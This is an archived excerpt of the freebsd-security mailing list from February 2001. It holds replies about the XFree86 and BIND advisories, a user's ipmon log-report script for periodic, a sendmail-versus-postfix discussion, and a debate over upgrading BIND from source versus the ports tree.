approach, however. > > 3) download a new port skeleton for the XFree86-3.3.6 port from: > > http://www.freebsd.org/ports/ > > and use it to rebuild the port. > > 4) Use the portcheckout utility to automate option (3) above. The > portcheckout port is available in /usr/ports/devel/portcheckout or the > package can be obtained from: > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portche ckout-2.0.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portche ckout-2.0.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portch eckout-2.0.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portch eckout-2.0.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portc heckout-2.0.tgz > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iQCVAwUBOm3xpFUuHi5z0oilAQF+zQQAiwIQSv6MemATgo6v2/QwMjttGpbMxbh2 > s94CK+aAlbtRlsrBZl6DIWwVydc1C3k6EHnM+NHqwhfOq/yrwp7JDKwVUmvi+5Qx > 1UAY8QRu45OednLsyT2qUuNrowjMmkdB0EcsqQq2UvLtN2054m6AmpZk1t3TjGTr > CCOFX30qIn0= > =pI+q > -----END PGP SIGNATURE----- > > > This is the moderated mailing list freebsd-announce. > The list contains announcements of new FreeBSD capabilities, > important events and project milestones. > See also the FreeBSD Web pages at http://www.freebsd.org > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-announce" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 12:12:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from icmp.dhs.org (unknown [24.108.142.198]) by hub.freebsd.org (Postfix) with ESMTP id E204D37B69D for ; Thu, 1 Feb 2001 12:11:59 -0800 (PST) Received: from localhost (modulus@localhost) by icmp.dhs.org (8.11.1/8.11.1) with ESMTP id f11KGlG72916; Thu, 1 Feb 2001 14:16:48 -0600 (CST) (envelope-from modulus@icmp.dhs.org) Date: Thu, 1 Feb 2001 14:16:47 -0600 (CST) From: disassembled To: "Thomas T. Veldhouse" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipmon and periodic In-Reply-To: <008c01c08c64$e07a3ee0$3028680a@tgt.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have written something like that. although it can be improved iam sure. I stored it under: /etc/periodic/daily/470.status-dev-ipl #!/usr/local/bin/bash #Generates & report on logged firewall activity #written by modulus@icmp.dhs.org 2001 _date=$(date) /usr/bin/touch /tmp/cron.ipf /sbin/ipmon -s -n I & /bin/sleep 2 kill -n 9 \ $(ps aux | grep ipmon | awk '{print $2}') # you can get rid of then ipmon -s N if you are not interested # in your nat logging entries. /sbin/ipmon -s N & /bin/sleep 2 kill -n 9 \ $(ps aux | grep ipmon | awk '{print $2}') echo Report Generated @ ${_date} > /tmp/cron.ipf echo syntax of ipmon: ipmon -s -n -I \ >> /tmp/cron.ipf /bin/cat /var/log/messages \ | grep ipmon \ | awk '{ print $6,$7,$8,$9,$10,$11, \ $12,$14,$15,$16,$17,$18,$19, \ $20,$21,$22}' \ >> /tmp/cron.ipf /usr/bin/mail -s"firewall logged packet output" \ root@icmp.dhs.org Has anybody written a script or modified the current nightly periodic > scripts to send ipmon output in the security email as is currently done for > ipfw? I have switched to ipfilter and I would like to see my daily ipmon > output - or at least the relavent stats. I would hate to replicate the work > if it has already been done :) > > Tom Veldhouse > veldy@veldy.net > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 12:18:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 05B8337B6CC for ; Thu, 1 Feb 2001 12:18:28 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id CE6D81AB2; Thu, 1 Feb 2001 15:18:26 -0500 (EST) Date: Thu, 1 Feb 2001 15:18:26 -0500 From: Will Andrews To: Paul Andrews Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Message-ID: <20010201151826.C479@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Paul Andrews , security@FreeBSD.ORG References: <200101300909.f0U99qv87528@freefall.freebsd.org> <005301c08c89$33722260$b13e6c18@videon.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="QnGs129iAKyuXRcc" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005301c08c89$33722260$b13e6c18@videon.ca>; from andrews@powersurfr.com on Thu, Feb 01, 2001 at 12:57:26PM -0700 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --QnGs129iAKyuXRcc Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote: > Does this issue affect only those that installed the XFree86 3.3.6 port or > does it also affect those who have installed FreeBSD 4.2 RELEASE. FreeBSD !=3D XFree86. The advisory specifies what is vulnerable. > If it does affect the RELEASE version what is the easiest why to fix this > problem, without upgrading to XFree86 4.01. If you have no users, just firewall off your X sockets (or tell X to turn them off). If you have users, just make sure they can't run anything setuid linked to libX11. 8) For other fixes, see below (as specified in the advisory): > > 1) Upgrade your entire ports collection and rebuild the XFree86-3.3.6 > > port. > > > > 2) Deinstall the old package and install an XFree86-4.0.2 package > > obtained from: > > > > [i386] > > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/x11/XFree8= 6-4 > .0.2_5.tgz > > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11/XFree8= 6-4 > .0.2_5.tgz > > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11/XFree= 86- > 4.0.2_5.tgz > > > > [alpha] > > Packages are not automatically generated for the alpha architecture at > > this time due to lack of build resources. > > > > NOTE: XFree86-3.3.6 packages are no longer made available, only the > > newer XFree86-4.0.2 packages. > > > > Note also that the XFree86-aoutlibs port has not yet been fixed: there > > is currently no solution to the problem other than removing the > > port/package and recompiling any dependent software to use ELF > > libraries, or switching to an ELF-based version of the software, if > > available (e.g. the BSD/OS or Linux versions of Netscape, as an > > alternative to the FreeBSD native version). The potential impact of > > the vulnerabilities to the local environment may be deemed not > > sufficiently great to warrant this approach, however. > > > > 3) download a new port skeleton for the XFree86-3.3.6 port from: > > > > http://www.freebsd.org/ports/ > > > > and use it to rebuild the port. > > > > 4) Use the portcheckout utility to automate option (3) above. The > > portcheckout port is available in /usr/ports/devel/portcheckout or the > > package can be obtained from: > > > > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/port= che > ckout-2.0.tgz > > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/port= che > ckout-2.0.tgz > > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/por= tch > eckout-2.0.tgz > > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/por= tch > eckout-2.0.tgz > > > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/po= rtc > heckout-2.0.tgz --=20 wca --QnGs129iAKyuXRcc Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6ecSSF47idPgWcsURAsq0AJ0XSfkjTM9YLQ8Pk67FvIfbKfpPPACfcZSA aUpv0caroS9je49tfkCTdhA= =JO6J -----END PGP SIGNATURE----- --QnGs129iAKyuXRcc-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 13: 6:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 3F47837B4EC for ; Thu, 1 Feb 2001 13:05:59 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id D93FCBA0CB; Thu, 1 Feb 2001 13:06:29 -0800 (PST) Date: Thu, 1 Feb 2001 13:06:29 -0800 From: Kris Kennaway To: Paul Andrews Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Message-ID: <20010201130629.B74541@xor.obsecurity.org> References: <200101300909.f0U99qv87528@freefall.freebsd.org> <005301c08c89$33722260$b13e6c18@videon.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="cvVnyQ+4j833TQvp" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005301c08c89$33722260$b13e6c18@videon.ca>; from andrews@powersurfr.com on Thu, Feb 01, 2001 at 12:57:26PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --cvVnyQ+4j833TQvp Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote: > Does this issue affect only those that installed the XFree86 3.3.6 port or > does it also affect those who have installed FreeBSD 4.2 RELEASE. >=20 > If it does affect the RELEASE version what is the easiest why to fix this > problem, without upgrading to XFree86 4.01. My understanding is that the XFree86 distribution is built from whatever is in ports at the time of release. In fact, doesn't sysinstall just install the port thesedays anyway? ls -l /var/db/pkg/XFree86* Kris --cvVnyQ+4j833TQvp Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6ec/VWry0BWjoQKURAoJ6AKDniLpISnjtZCH4qQL/mUbWZznX1gCfbkOV Os2DP58566oVXtNgg06WsxY= =eRwy -----END PGP SIGNATURE----- --cvVnyQ+4j833TQvp-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 13:52:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88]) by hub.freebsd.org (Postfix) with ESMTP id 85D8B37B491 for ; Thu, 1 Feb 2001 13:52:26 -0800 (PST) Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241]) by meow.osd.bsdi.com (8.11.1/8.9.3) with ESMTP id f11LkR357618; Thu, 1 Feb 2001 13:46:27 -0800 (PST) (envelope-from jhb@FreeBSD.org) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <20010201130629.B74541@xor.obsecurity.org> Date: Thu, 01 Feb 2001 13:52:11 -0800 (PST) From: John Baldwin To: Kris Kennaway Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Cc: security@FreeBSD.org, Paul Andrews Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 01-Feb-01 Kris Kennaway wrote: > On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote: >> Does this issue affect only those that installed the XFree86 3.3.6 port or >> does it also affect those who have installed FreeBSD 4.2 RELEASE. >> >> If it does affect the RELEASE version what is the easiest why to fix this >> problem, without upgrading to XFree86 4.01. > > My understanding is that the XFree86 distribution is built from > whatever is in ports at the time of release. In fact, doesn't > sysinstall just install the port thesedays anyway? > > ls -l /var/db/pkg/XFree86* > > Kris No, it builds the distribution from ports, and then engages in evilness to package up the bits in tarballs that mimic the normal XFree distributions. -- John Baldwin -- http://www.FreeBSD.org/~jhb/ PGP Key: http://www.baldwin.cx/~john/pgpkey.asc "Power Users Use the Power to Serve!" - http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 15:37: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from juice.shallow.net (node16229.a2000.nl [24.132.98.41]) by hub.freebsd.org (Postfix) with ESMTP id D146537B6AB for ; Thu, 1 Feb 2001 15:36:46 -0800 (PST) Received: from localhost (joshua@localhost) by juice.shallow.net (8.11.1/8.11.1) with ESMTP id f11NaeP79814; Fri, 2 Feb 2001 00:36:40 +0100 (CET) (envelope-from joshua@roughtrade.net) Date: Fri, 2 Feb 2001 00:36:40 +0100 (CET) From: Joshua Goodall To: Dag-Erling Smorgrav Cc: Alfred Perlstein , Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1 Feb 2001, Dag-Erling Smorgrav wrote: > Does anybody read this list, or do you all just post to it without > reading anything anyone else is posting? I posted detailed > instructions for a) upgrading a vulnerable system without making > world, and b) setting up BIND in chroot and jail sandboxes, including > how to deal with ndc and log sockets, just a few days ago. If you mean that begins with: > RELENG_3 has been fixed, please follow the procedure below if you're > running 2.2.x or 3.x (tested on 3.5-STABLE, should work on 2.2.x but > no guarantees): ... then I confess that I read that paragraph and skipped the rest since I'm on 4.2-STABLE and I was wading through too many emails on the subject. Although, yes, having gone back, it is certainly relevant and useful for RELENG_4 trackers. j -- Joshua Goodall A friend of mine works for a medium-sized telco. He has no phone, because (and I quote) "the lady who provisions phones is on holiday" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 15:48:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id E5EDB37B4EC; Thu, 1 Feb 2001 15:48:20 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 765EBBA0CB; Thu, 1 Feb 2001 15:48:47 -0800 (PST) Date: Thu, 1 Feb 2001 15:48:47 -0800 From: Kris Kennaway To: John Baldwin Cc: Kris Kennaway , security@FreeBSD.org, Paul Andrews Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Message-ID: <20010201154847.A74995@xor.obsecurity.org> References: <20010201130629.B74541@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="AqsLC8rIMeq19msA" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jhb@FreeBSD.org on Thu, Feb 01, 2001 at 01:52:11PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --AqsLC8rIMeq19msA Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Feb 01, 2001 at 01:52:11PM -0800, John Baldwin wrote: >=20 > On 01-Feb-01 Kris Kennaway wrote: > > On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote: > >> Does this issue affect only those that installed the XFree86 3.3.6 por= t or > >> does it also affect those who have installed FreeBSD 4.2 RELEASE. > >>=20 > >> If it does affect the RELEASE version what is the easiest why to fix t= his > >> problem, without upgrading to XFree86 4.01. > >=20 > > My understanding is that the XFree86 distribution is built from > > whatever is in ports at the time of release. In fact, doesn't > > sysinstall just install the port thesedays anyway? > >=20 > > ls -l /var/db/pkg/XFree86* > >=20 > > Kris >=20 > No, it builds the distribution from ports, and then engages in evilness to > package up the bits in tarballs that mimic the normal XFree distributions. OK, and the reason we can't just leave it a port is because of General Sysinstall Evilness? kris --AqsLC8rIMeq19msA Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6efXfWry0BWjoQKURAt8OAKDbnYen9nXa1z3eeqkY5zyDrXZ7VwCeK/Ay bQOg4RxvbCpQwiY/MZCglCs= =0ZX/ -----END PGP SIGNATURE----- --AqsLC8rIMeq19msA-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 15:57: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88]) by hub.freebsd.org (Postfix) with ESMTP id A369E37B4EC for ; Thu, 1 Feb 2001 15:56:42 -0800 (PST) Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241]) by meow.osd.bsdi.com (8.11.1/8.9.3) with ESMTP id f11Nuc361355; Thu, 1 Feb 2001 15:56:38 -0800 (PST) (envelope-from jhb@FreeBSD.org) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <20010201154847.A74995@xor.obsecurity.org> Date: Thu, 01 Feb 2001 15:56:29 -0800 (PST) From: John Baldwin To: Kris Kennaway Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Cc: Paul Andrews , security@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 01-Feb-01 Kris Kennaway wrote: > On Thu, Feb 01, 2001 at 01:52:11PM -0800, John Baldwin wrote: >> >> On 01-Feb-01 Kris Kennaway wrote: >> > On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote: >> >> Does this issue affect only those that installed the XFree86 3.3.6 port >> >> or >> >> does it also affect those who have installed FreeBSD 4.2 RELEASE. >> >> >> >> If it does affect the RELEASE version what is the easiest why to fix this >> >> problem, without upgrading to XFree86 4.01. >> > >> > My understanding is that the XFree86 distribution is built from >> > whatever is in ports at the time of release. In fact, doesn't >> > sysinstall just install the port thesedays anyway? >> > >> > ls -l /var/db/pkg/XFree86* >> > >> > Kris >> >> No, it builds the distribution from ports, and then engages in evilness to >> package up the bits in tarballs that mimic the normal XFree distributions. > > OK, and the reason we can't just leave it a port is because of General > Sysinstall Evilness? Something like that, yes. If someone were to undertake splitting the XFree86-3 port up into separate ports like the XFree86-4-* ports, that follow the same split, then we might be able to convince jkh to switch to using that instead of the X distributions. Maybe. If we are real lucky. :) > kris -- John Baldwin -- http://www.FreeBSD.org/~jhb/ PGP Key: http://www.baldwin.cx/~john/pgpkey.asc "Power Users Use the Power to Serve!" - http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 18: 9: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id BA13037B6A1 for ; Thu, 1 Feb 2001 18:08:48 -0800 (PST) Received: (qmail 8928 invoked from network); 2 Feb 2001 02:08:40 -0000 Received: from swun.esec.com.au (HELO esec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 2 Feb 2001 02:08:40 -0000 Message-ID: <3A7A180F.518292C1@esec.com.au> Date: Fri, 02 Feb 2001 13:14:39 +1100 From: Sam Wun Organization: eSec Limited X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: disassembled Cc: "Thomas T. Veldhouse" , freebsd-security@FreeBSD.ORG Subject: Re: ipmon and periodic References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, does anyone know how to convert a packet to number of bytes? Thanks Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 18:34: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from sabre.velocet.net (sabre.velocet.net [198.96.118.66]) by hub.freebsd.org (Postfix) with ESMTP id 0F80D37B503; Thu, 1 Feb 2001 18:33:43 -0800 (PST) Received: from office.tor.velocet.net (trooper.velocet.net [204.138.45.2]) by sabre.velocet.net (Postfix) with ESMTP id 44FC0138067; Thu, 1 Feb 2001 21:33:41 -0500 (EST) Received: (from dgilbert@localhost) by office.tor.velocet.net (8.11.2/8.9.3) id f122Xdl66970; Thu, 1 Feb 2001 21:33:39 -0500 (EST) (envelope-from dgilbert) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14970.7298.155915.471272@trooper.velocet.net> Date: Thu, 1 Feb 2001 21:33:38 -0500 (EST) To: "Andre Hall" Cc: "Dragos Ruiu" , "Christopher Farley" , "Fenix" , , Subject: [security] Re: sendmail vs. postfix question In-Reply-To: <001c01c08c60$a49ee640$040aa8c0@pcgameauthority.com> References: <01020104192002.01203@xs4some.net> <20010131235613.A7019@northernbrewer.com> <01020103331409.27656@smp.kyx.net> <001c01c08c60$a49ee640$040aa8c0@pcgameauthority.com> X-Mailer: VM 6.75 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [various, deleted] I must say that I actually understand sendmail at a low level. Back in '92 (before many alternatives were viable) I did signifcant raw .cf hacking that I am confident modern alternatives would not be able to grok. But those problems were extrodinary... Last year, I installed one of our machines with postfix. Since then, I have been happy and when opportunity has presented itself, I have loaded other machines with postfix in our network. It performs well, and I have only had minor issues. - recently rmail changed the flags it uses. Caused some coniptions before I relized what was causing delivery failure. Luckily uucp saves failed data. - One machine mysteriously "looses" the postfix master process. It's still running, but not working ... and (annoyingly) at a different PID than "postfix reload" expects it to be. I havn't got a fix for this one yet. - You can't get "real" status from Postfix. The latter is apparently a design issue. With little daemons doing little jobs, it's difficult to get the type of status info that you get from ps -axww about sendmail. That said, only one major machine in our network is left running sendmail. It will likely fall. I could fix what I don't like about it with .cf hacking, but postfix does it's job better and has more direct configuration for it's issue. In short, I like the security of non-root processing (esp. for smptd). I like the simple configuration and speed. I don't like that I can't tell that a certain smtp instance is talking to a certain host X. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 18:51:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from icmp.dhs.org (unknown [24.108.142.198]) by hub.freebsd.org (Postfix) with ESMTP id 00C2737B4EC for ; Thu, 1 Feb 2001 18:51:41 -0800 (PST) Received: from localhost (modulus@localhost) by icmp.dhs.org (8.11.1/8.11.1) with ESMTP id f122uFh77252; Thu, 1 Feb 2001 20:56:16 -0600 (CST) (envelope-from modulus@icmp.dhs.org) Date: Thu, 1 Feb 2001 20:56:14 -0600 (CST) From: disassembled To: Sam Wun Cc: "Thomas T. Veldhouse" , freebsd-security@FreeBSD.ORG Subject: Re: ipmon and periodic In-Reply-To: <3A7A180F.518292C1@esec.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org struct packet { struct tcp_header foo; struct ip_header var; }; If you want to get the size of a tcp packet, (in the psuedo code above thats a valid example) the size of your tcp packet in bytes would be equal to: sizeof(packet); /* if you are familliar with C that is */ is generally a good place to start. hope this helps On Fri, 2 Feb 2001, Sam Wun wrote: > Hi, > > does anyone know how to convert a packet to number of bytes? > > Thanks > Sam > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 21:22: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 1FC7A37B65D for ; Thu, 1 Feb 2001 21:21:49 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14NglM-0000a9-00; Tue, 30 Jan 2001 12:48:24 -0700 Message-ID: <3A771A88.6F71AA2E@softweyr.com> Date: Tue, 30 Jan 2001 12:48:24 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roger Marquis wrote: > > Mehmet Hinc wrote: > > Stop in /usr/ports/net/bind8. > > *** Error code 1 > > > > What ??????????? Why??????????? I updated my ports and tried to install > > bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was > > installing it, I had a error msgs. (in the up) > > please let me know How can I fix it !!! > > Bind was written on BSD. What's the point of using a port to > upgrade it? All FreeBSD's bind port does is increase your chances > of errors, reduce your system's overall QA, and install duplicate > files in non-standard places. You completely and utterly fail to understand how the ports system works. What FreeBSD's bind port really does is decrease your chance of errors, increase your systems's overall QA, install all of the bind configuration and executable files in standard FreeBSD locations, track which files were installed and allow you to deinstall them simply, and provide a one-stop upgrade path. > The following steps have worked > flawlessly over this and several bind upgrades: > > cd /tmp > fetch ftp.isc.org/isc/bind/src/8.2.3/bind-src.tar.gz > tar xzvf bind-src.tar.gz > cd src > make install > killall named > named > ps auxww | grep named > cd /tmp > rm -rf src bind-src.tar.gz Versus cd /usr/ports/net/bind8 make install Or, for an upgrade, make deinstall reinstall Oh, yes, that simplifies things quite nicely. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 21:30:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id C641937B4EC for ; Thu, 1 Feb 2001 21:30:13 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14OYv1-0000P7-00; Thu, 01 Feb 2001 22:37:59 -0700 Message-ID: <3A7A47B7.242E4053@softweyr.com> Date: Thu, 01 Feb 2001 22:37:59 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: "Yuri A. Wolf" Cc: freebsd-security@FreeBSD.org Subject: Re: bind8.2.3 - where is the correct place to download src? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Yuri A. Wolf" wrote: > > On Tue, 30 Jan 2001, Kris Kennaway wrote: > > > On Wed, Jan 31, 2001 at 09:45:37AM +0600, Yuri A. Wolf wrote: > > > > > i meant the place at ftp.freebsd.org where the port is. yesterday i > > > downloaded the new port (with patches of course), but there was an error > > > during patching (patch-ac). the sources were from ftp.isc.org, and i > > > putted them into distfiles, so there wasn't mistake as i think... > > > > www.freebsd.org/ports - fairly obvious location, eh? :) > > yeah I know that, I was there hundreds times... > > actually I just checked there is bind-8.2.2.p7 in title at > http://www.FreeBSD.org/ports/net.html and links to 8.2.3 on ftp.isc.org > > that's why i asked > well, i'll try to download and make port again... but I'm not sure changes > made... You can download and make the same port over and over again and it will never change. If you want to get the update version, you will need to update the port kit on your system, using CVSup or something like that. For more information, see the FreeBSD Handbook on your system, look for the topic "Keeping up to date with CVSup." -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 22:31:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 623DD37B503 for ; Thu, 1 Feb 2001 22:31:00 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 27C961AB2; Fri, 2 Feb 2001 01:30:57 -0500 (EST) Date: Fri, 2 Feb 2001 01:30:57 -0500 From: Will Andrews To: Wes Peters Cc: Roger Marquis , security@FreeBSD.ORG 